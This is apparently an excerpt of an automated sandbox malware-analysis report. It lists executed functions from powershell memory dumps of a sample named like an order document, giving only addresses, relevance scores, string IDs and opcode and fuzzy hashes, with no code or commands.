                                                                            • Associated: 00000000.00000002.2051623639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051623639.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051786812.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_order CF08093-24.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                            • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                                            • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                            • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

                                                                            Executed Functions

                                                                            Function 0749BF57 Relevance: 14.7, Strings: 11, Instructions: 994COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$(fsl$4']q$4']q$4']q$4']q$4pl$4pl$x.dk$x.dk$-dk
                                                                            • API String ID: 0-549173673
                                                                            • Opcode ID: 48a37a8bda9683ed8e836f307f598e24a22f38980f47f4d8bdd286cac809e08f
                                                                            • Instruction ID: b11abce3a1b2c7a52b10786f978abcb1b5ebe7c284dea46c4d164df3edbd9071
                                                                            • Opcode Fuzzy Hash: 48a37a8bda9683ed8e836f307f598e24a22f38980f47f4d8bdd286cac809e08f
                                                                            • Instruction Fuzzy Hash: 5E9241B4B002149FDB14DB68CD91BAABBB2EB85304F1085E9D90D5B355CB72DD82CFA1
                                                                            Function 07497258 Relevance: 10.4, Strings: 8, Instructions: 373COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$(fsl$4']q$4']q$4']q$4']q$x.dk$-dk
                                                                            • API String ID: 0-4215828846
                                                                            • Opcode ID: dd58c8985522823ec857cbd4aa684ffee4313529539074cf23aef028fdea27a8
                                                                            • Instruction ID: 1bb0b00ea62303d3b85df816595b54042d7dca7b1979e0f6ac196d34dd4694cb
                                                                            • Opcode Fuzzy Hash: dd58c8985522823ec857cbd4aa684ffee4313529539074cf23aef028fdea27a8
                                                                            • Instruction Fuzzy Hash: 3BE1C3B0B202159FCB15DB68C651BAEBFA2EF84300F15D86AD8056F355CB36EC45CB91
                                                                            Function 0749723B Relevance: 6.6, Strings: 5, Instructions: 303COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$4']q$4']q$x.dk$-dk
                                                                            • API String ID: 0-401039236
                                                                            • Opcode ID: 92626a56643b8d5aa2a350bcb50e6e42100a2c9d7ce60a382f131013a46a41d0
                                                                            • Instruction ID: b702a3da7f549ec9460ff2223f9e11a341dbd441ccde10d89f1b57417f532072
                                                                            • Opcode Fuzzy Hash: 92626a56643b8d5aa2a350bcb50e6e42100a2c9d7ce60a382f131013a46a41d0
                                                                            • Instruction Fuzzy Hash: FBC1A0B0A202159FCB15CF58C641BAEBFB2AF84314F15D46AD8046F756CB36EC49CBA1
                                                                            Function 074965E4 Relevance: 5.6, Strings: 4, Instructions: 597COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$x.dk$-dk
                                                                            • API String ID: 0-1872766135
                                                                            • Opcode ID: 7892771df6936050b1ca38f2988ff27f8ebbdeff7bc7eb38700011a5df99d2fe
                                                                            • Instruction ID: d8909478d7b8c8a1bbc139bb6d641b2c1eac5b8c2f9328bdb9168d5de7f74a92
                                                                            • Opcode Fuzzy Hash: 7892771df6936050b1ca38f2988ff27f8ebbdeff7bc7eb38700011a5df99d2fe
                                                                            • Instruction Fuzzy Hash: 7C3293B0B102149FDB14DB68C951BAABBB2EF84304F15C4A9D9089F395CB72ED45CFA1
                                                                            Function 0749C929 Relevance: 5.4, Strings: 4, Instructions: 425COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$4']q$4pl$x.dk
                                                                            • API String ID: 0-2610102465
                                                                            • Opcode ID: 3b2e5fa3d149150f751b5d7c2a69a7fa5aa321415212c152d01ccc0284fd2ff4
                                                                            • Instruction ID: 5c1e84058d2ba8df6409160e26ba6a99bc7d2d182851dfcc7d501494aba52e1b
                                                                            • Opcode Fuzzy Hash: 3b2e5fa3d149150f751b5d7c2a69a7fa5aa321415212c152d01ccc0284fd2ff4
                                                                            • Instruction Fuzzy Hash: CD122CB4A00215DFDB64DB24C991BEABBB2FB85304F1481E9D90D5B355CB329D82CFA1
                                                                            Function 0749C913 Relevance: 5.3, Strings: 4, Instructions: 331COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$4']q$4pl$x.dk
                                                                            • API String ID: 0-2610102465
                                                                            • Opcode ID: f4be08ffd4c20edd6b2545594c98ded2fa798d699e2fe810a79d9d7beb9a0b87
                                                                            • Instruction ID: e79185ebaa295a55a5888d49f85829de781b97955d4bd33bf0876b515fa82de3
                                                                            • Opcode Fuzzy Hash: f4be08ffd4c20edd6b2545594c98ded2fa798d699e2fe810a79d9d7beb9a0b87
                                                                            • Instruction Fuzzy Hash: F6E12BB0A00215DFDB64CB24C991BEABBB2FB85304F1485E9D90D6B355CB329D81CFA1
                                                                            Function 07496EAA Relevance: 4.4, Strings: 3, Instructions: 654COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$x.dk$-dk
                                                                            • API String ID: 0-3850510335
                                                                            • Opcode ID: 37e2a79ff9094802d4124a5b3953962693ca8f4b5f18ebe393d424a8ce5d505b
                                                                            • Instruction ID: 4f480946b11acdf90da60baf4caadbef70a25ea2e3755da596fce538cae20e6b
                                                                            • Opcode Fuzzy Hash: 37e2a79ff9094802d4124a5b3953962693ca8f4b5f18ebe393d424a8ce5d505b
                                                                            • Instruction Fuzzy Hash: B75260B0B102159FDB14DB18C951BAABBB2FB84304F15C0A9D9099F395CB72ED85CFA1
                                                                            Function 0749C7A3 Relevance: 4.4, Strings: 3, Instructions: 621COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$x.dk$-dk
                                                                            • API String ID: 0-3850510335
                                                                            • Opcode ID: 45d5ab9ae5a1a54881a991fa6365ebc02fcc6ae184c1c93b3f38904d0d1ecdb0
                                                                            • Instruction ID: 872fc1a79a412a6649881ecf81eeef43b942b2831f9d52eed9428606c5067714
                                                                            • Opcode Fuzzy Hash: 45d5ab9ae5a1a54881a991fa6365ebc02fcc6ae184c1c93b3f38904d0d1ecdb0
                                                                            • Instruction Fuzzy Hash: F9424DB4B402149FD714DB58CD91BABBBB2EB89304F1081A9D90D5B751CB72ED828FE1
                                                                            Function 0749C889 Relevance: 4.2, Strings: 3, Instructions: 469COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$x.dk$-dk
                                                                            • API String ID: 0-3850510335
                                                                            • Opcode ID: 369c172a47234a68b24c2ab1205243adcf41a4df679c06be33b7c27567e53054
                                                                            • Instruction ID: f16958982de5bcbff407b06154bbc554a233b0743cf02a145ff969c21d5634fa
                                                                            • Opcode Fuzzy Hash: 369c172a47234a68b24c2ab1205243adcf41a4df679c06be33b7c27567e53054
                                                                            • Instruction Fuzzy Hash: 67124EB4B102149FD714DB58CD91BABBBA2EB89304F1081A9D90D5F791CB72ED428FE1
                                                                            Function 07493E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q
                                                                            • API String ID: 0-182748909
                                                                            • Opcode ID: 731e6485a11fde3014d6975ec020d9e1fe1980a48bcf8e0325cad601cc2729d8
                                                                            • Instruction ID: 855d79b4c89a6d955179f9361df4827aabe1bc39497a250f6134baaa7e24dfda
                                                                            • Opcode Fuzzy Hash: 731e6485a11fde3014d6975ec020d9e1fe1980a48bcf8e0325cad601cc2729d8
                                                                            • Instruction Fuzzy Hash: BF4107B2B001169BCF149E6DC9806ABBFE5AF85711B14897BC845D7345EA32DD01C7E1
                                                                            Function 074978B0 Relevance: 3.0, Strings: 2, Instructions: 544COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (fsl$(fsl
                                                                            • API String ID: 0-916006527
                                                                            • Opcode ID: 177b10e126e74e8b0bf593c8206a29a459f70204ac46227eac7aab652d7fcd8a
                                                                            • Instruction ID: fba7851886e784b53b8be627cbabacbc283f760f6bfb851b7068e19563663aae
                                                                            • Opcode Fuzzy Hash: 177b10e126e74e8b0bf593c8206a29a459f70204ac46227eac7aab652d7fcd8a
                                                                            • Instruction Fuzzy Hash: 64227DB0B20204DFDB14CB58C651EAEBBB2EF85304F55806AE905AF355CB72ED46CB91
                                                                            Function 074976F8 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: x.dk
                                                                            • API String ID: 0-1726819062
                                                                            • Opcode ID: e3e3712fe9cf6d67a4c5aeec675b5e79f8046f6ec22f7ad1d4756359988f4b88
                                                                            • Instruction ID: ab6a6a3358162a3a269894e4f5839e79b3b94b5374680b8d57e184c16fdc491c
                                                                            • Opcode Fuzzy Hash: e3e3712fe9cf6d67a4c5aeec675b5e79f8046f6ec22f7ad1d4756359988f4b88
                                                                            • Instruction Fuzzy Hash: 4431D3B0B50114AFD704AB68CA51BAE7BA3DF84700F10C869E9056F791CF76AC498BA1
                                                                            Function 091F1E68 Relevance: .4, Instructions: 428COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6adc46f099f97d7096a13633d85b6c779810a92e5b8e49c88db9534f39daebcc
                                                                            • Instruction ID: dfbe3eca1b40f33edf6a68275e62d4f2c7d6f16628f77e6987c21aedaeb3248d
                                                                            • Opcode Fuzzy Hash: 6adc46f099f97d7096a13633d85b6c779810a92e5b8e49c88db9534f39daebcc
                                                                            • Instruction Fuzzy Hash: 04025971B00209DFCB05CF98D990AAEBBB2FF88314F248559E915AB365C735ED41CB90
                                                                            Function 091F2428 Relevance: .4, Instructions: 423COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e6d761c6aece46204ed235a09ceea4ee91afae2fecf7fad6bdb6aaf34cf7e375
                                                                            • Instruction ID: c1e6e90339cbecb8ae2182e2fc4ac4031dc2fce36c4fc6fa9948ff4e111f020f
                                                                            • Opcode Fuzzy Hash: e6d761c6aece46204ed235a09ceea4ee91afae2fecf7fad6bdb6aaf34cf7e375
                                                                            • Instruction Fuzzy Hash: 1F024B74A01209DFCB05CF98D994AEEBBB2FF88314F248559E915AB365C735EC81CB90
                                                                            Function 091F14A0 Relevance: .4, Instructions: 398COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e4310b4227817c8738a75a3697439e7c10d8b77b845b040d0492a18bb8f86e8
                                                                            • Instruction ID: 25a9f567264deee65b71e249339d33a9d6c541499175760f697f24c3ad348d61
                                                                            • Opcode Fuzzy Hash: 8e4310b4227817c8738a75a3697439e7c10d8b77b845b040d0492a18bb8f86e8
                                                                            • Instruction Fuzzy Hash: E8022774A05209EFCB05CF98D594AADBBF2FF88324F658159E905AB365C731EC81CB90
                                                                            Function 07497893 Relevance: .4, Instructions: 390COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4b50b555f5f3cb68ee025c7e5957e98e34a37cf6ebd5343cb584b2bb8ae296e7
                                                                            • Instruction ID: cc58620d7d1ac207fa98e48a9c2ea1ef8a358f4ebccc293199a85e7e514d4d12
                                                                            • Opcode Fuzzy Hash: 4b50b555f5f3cb68ee025c7e5957e98e34a37cf6ebd5343cb584b2bb8ae296e7
                                                                            • Instruction Fuzzy Hash: D3F160B4B21204DFDB05CB58C541EAEBBB2EF85304F5580AAE905AF351CB72ED46CB91
                                                                            Function 07494548 Relevance: .4, Instructions: 382COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f42f7991f4cb98ff77accd59d29a643e0fababaf2b36734de1ac9dbe330af3d5
                                                                            • Instruction ID: 0c93637f3c3e57cb399605b7a0758fd8e3cb0631df23d0615a460ec6ae02016b
                                                                            • Opcode Fuzzy Hash: f42f7991f4cb98ff77accd59d29a643e0fababaf2b36734de1ac9dbe330af3d5
                                                                            • Instruction Fuzzy Hash: 2CE15EB0B012459FCB14CB9CC581EABBBB2EF89714F15C06AE9059B355CB72EC42CB95
                                                                            Function 091F0B80 Relevance: .3, Instructions: 346COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ae04fbcb0222aebe7af9e253bb2f63b2efcc1871d5a698b3f5d05b85b8bf160
                                                                            • Instruction ID: b845eb6f524f5f47f29f07aa6d95a401925e0041a0609f41ec8ae10535d33678
                                                                            • Opcode Fuzzy Hash: 5ae04fbcb0222aebe7af9e253bb2f63b2efcc1871d5a698b3f5d05b85b8bf160
                                                                            • Instruction Fuzzy Hash: 28E14B74A01209DFDB05CF98D594A9DFBB2FF88314F258199E915AB362C731ED81CB90
                                                                            Function 0749452F Relevance: .3, Instructions: 342COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 44a2f7b058ebe36858ebe81b590edf9ed3c64c338472a752b68d5de85bef7826
                                                                            • Instruction ID: 2e269553784495c8b8cfdd5a25a74a445bb4e53afd7300fafd25fd11ce2f4bf5
                                                                            • Opcode Fuzzy Hash: 44a2f7b058ebe36858ebe81b590edf9ed3c64c338472a752b68d5de85bef7826
                                                                            • Instruction Fuzzy Hash: 87E18DB4A01245DFDB14CF5CC580EAABBB2EF89714F15C06AE905AB391C772EC42CB94
                                                                            Function 091F07C8 Relevance: .2, Instructions: 222COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ce419b9dc3d0454e9634c42bb32c755c96a1335bdbb09722d762adb5d486a9f9
                                                                            • Instruction ID: b1fd0f384e26d83d59038ba6a67e6330140529b2871e6ede7a5e00d66cbddcd9
                                                                            • Opcode Fuzzy Hash: ce419b9dc3d0454e9634c42bb32c755c96a1335bdbb09722d762adb5d486a9f9
                                                                            • Instruction Fuzzy Hash: 8081A331B002098FCB05DF69D990AAEB7F6FF88314F148569D4099B365DB34ED06CBA1
                                                                            Function 091F29E0 Relevance: .1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b973af40cf6ce47c252e61766cb2919e6ef74e50d43ea0a9b2f919cc65138312
                                                                            • Instruction ID: ada8ee77141985a42a82241c281a65ea9e51eda6d86a35eb3bb1610142a11f91
                                                                            • Opcode Fuzzy Hash: b973af40cf6ce47c252e61766cb2919e6ef74e50d43ea0a9b2f919cc65138312
                                                                            • Instruction Fuzzy Hash: 2D513E70A006098FCB15CF9CC9959AEBBB2FF88314B248559E965EB3A4D735EC41CB90
                                                                            Function 091F29D0 Relevance: .1, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ac69b6b6576062ad9dc2ca8bdc8a3b142c80386e9bd094933260aa25d04a0d65
                                                                            • Instruction ID: 921adeb5546a93511c8db1d6ccd14ff4b0594a0e92a3171086e7371af053537c
                                                                            • Opcode Fuzzy Hash: ac69b6b6576062ad9dc2ca8bdc8a3b142c80386e9bd094933260aa25d04a0d65
                                                                            • Instruction Fuzzy Hash: 24511E70A006098FCB15CF9CC5959AEFBB2FF88314B248658E965AB3A4D731EC51CB50
                                                                            Function 091F2417 Relevance: .1, Instructions: 117COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1a242ca4cc238fd50094dd81dc299a1261bd2730fe48b4604bfb9428ba563757
                                                                            • Instruction ID: ad40597caf85b7183e8759075ec1a5431ec91834f9cdfcc91af982c04daed60a
                                                                            • Opcode Fuzzy Hash: 1a242ca4cc238fd50094dd81dc299a1261bd2730fe48b4604bfb9428ba563757
                                                                            • Instruction Fuzzy Hash: FC411A70A011098FCB15CF9CC9A49EEBBB1FF48314B248669E955EB3A5C335EC41CB50
                                                                            Function 091F1490 Relevance: .1, Instructions: 117COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d2bbb107c1bbb9d9895e6d05e28c1bdbb31d161d1cbdd4a61a15403d58905bd8
                                                                            • Instruction ID: 1e1881c9099ee907aa120f2477740761482e0b542261aef54597f3b777ce0abe
                                                                            • Opcode Fuzzy Hash: d2bbb107c1bbb9d9895e6d05e28c1bdbb31d161d1cbdd4a61a15403d58905bd8
                                                                            • Instruction Fuzzy Hash: 86412674A04209DFCB05CF9CC9909AEBBB2FF89324B248659E955E7364D331EC41CBA0
                                                                            Function 091F1E57 Relevance: .1, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 886e12265f7df974e30606a5799d5147541c756d6ebf2527bee35b248eba325c
                                                                            • Instruction ID: 11ed401cf6ad9aababd5f228d083ef6821789af4fff4f6f00667794eec4a43b1
                                                                            • Opcode Fuzzy Hash: 886e12265f7df974e30606a5799d5147541c756d6ebf2527bee35b248eba325c
                                                                            • Instruction Fuzzy Hash: 5F410774A00109DFCB05CF9CC9949AEBBF2FF48314B288699E955A73A4C735EC51CB90
                                                                            Function 0749214C Relevance: .1, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 97f4aea502939e017b5345af305dc04f1eda5256b2eadcd4799d322e81b653a2
                                                                            • Instruction ID: 9bd5f53271661b7254bb208ab43d7c0eb46fe496eef6552e55ac686cf93ab082
                                                                            • Opcode Fuzzy Hash: 97f4aea502939e017b5345af305dc04f1eda5256b2eadcd4799d322e81b653a2
                                                                            • Instruction Fuzzy Hash: F9317AF2700125DBCB1157789D126EFBB92EFD5315F00887BCA019F752CEB2991287A2
                                                                            Function 091F072D Relevance: .1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7ae109bf2c68b622b9de7214400098e234459f699153792bc2fe4c2e7182757f
                                                                            • Instruction ID: 1e97c017cde8f0c5887b9b62b9989e1d39dd4783c6ceafa6718006d0e63654fd
                                                                            • Opcode Fuzzy Hash: 7ae109bf2c68b622b9de7214400098e234459f699153792bc2fe4c2e7182757f
                                                                            • Instruction Fuzzy Hash: 8931A031A0E3D95FD703AB78A8607C97F759F43214F0A40EBC890CF1A3E629595AC7A5
                                                                            Function 07498734 Relevance: .1, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3117586053.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_7490000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ffc6d9ce5802e46edfb26e63d6ffd8c00a49877d7a461eece798405a3ecabcde
                                                                            • Instruction ID: a0e96372ada4bef694a5ebb12cd0ff996ce0cfe9fe7cfab73834a3844efe13b1
                                                                            • Opcode Fuzzy Hash: ffc6d9ce5802e46edfb26e63d6ffd8c00a49877d7a461eece798405a3ecabcde
                                                                            • Instruction Fuzzy Hash: 2D3126F67142128BCF158A2C98512FBFF9ADBC3210F0488BBC5468B391DB36D985C3A1
                                                                            Function 091F0B72 Relevance: .1, Instructions: 81COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.3123763177.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_91f0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
